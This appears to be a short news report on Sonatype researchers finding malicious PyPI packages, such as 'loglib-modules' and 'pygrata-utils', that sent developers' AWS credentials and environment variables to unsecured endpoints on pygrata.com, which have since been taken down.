Sonatype researchers discovered malicious code in multiple Python packages that uploaded users’ Amazon Web Services (AWS) credentials and environment variables to a publicly exposed domain.
Sonatype’s automated malware detection system initially discovered the malicious packages, after which the company’s researchers reported them to the Python Package Index (PyPI) team.
The packages and the endpoint have since been taken down.
“It remains yet to be known who the actors behind these packages are and what is their ultimate goal,” Sonotype security researcher Ax Sharma said.
The malicious packages were identified as “loglib-modules”, “pyg-modules”, “pygrata”, “pygrata-utils”, and “hkg-sol-utiils”.
Sharma said that the “loglib-modules” and “pyg-modules” packages target developers familiar with the legitimate “loglib” and “pyg” libraries.
Sonatype security researchers Jorge Cardona and Carlos Fernandez determined that the packages either contain code that reads and extracts developers’ sensitive data or install dependencies that do the same.
Sharma explained that the “loglib-modules” and “pygrata-utils” outright contain lines of malicious code, while “pygrata” installs one of the former packages as a dependency to accomplish the same functionality.
The “loglib-modules” would collect AWS credentials, network interface information, and environment variables.
The script then attempted to upload this data to one or more endpoints hosted on the pygrata.com domain.
“The usage of the PyGrata[.]com domain and the names of some of the malicious packages (pygrata-utils) weren’t imminently clear to us as to their purpose,” Sharma said.
The researchers noted that the endpoints contained hundreds of text files that any web user could access.
“Troublingly, the endpoints hosting this information in the form of hundreds of .TXT files were not secured by any authentication barrier, effectively permitting any party on the web to access these credentials,” Sharma said.